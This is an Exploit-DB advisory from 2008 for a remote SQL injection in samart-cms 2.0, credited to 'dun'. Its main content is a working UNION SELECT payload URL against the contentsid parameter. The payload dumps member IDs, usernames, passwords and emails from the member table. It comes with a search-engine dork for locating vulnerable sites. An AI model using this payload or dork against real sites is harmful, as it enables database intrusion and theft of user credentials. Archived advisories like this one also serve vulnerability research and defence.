samart-cms 2.0 contentsid Remote SQL Injection Vulnerability

2008-06-19T00:00:00
ID EDB-ID:5862
Type exploitdb
Reporter dun
Modified 2008-06-19T00:00:00

Description

samart-cms 2.0 (contentsid) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                              :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #################################################################
 #   [ samart-cms 2.0 ]   Remote SQL Injection Vulnerability     #
 #################################################################
 #
 # Script site: http://samart.6x.to/
 # 
 # Vuln: 
 # http://site.com/site.php?contentsid=-1+UNION%20SELECT+1,2,4,3,concat_ws(char(58),m_id,m_username,m_password,m_email),6,7+from+member/*
 #
 # 
 # Dork example: "Powered by samart-cms"
 #
 ###############################################
 # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-06-19]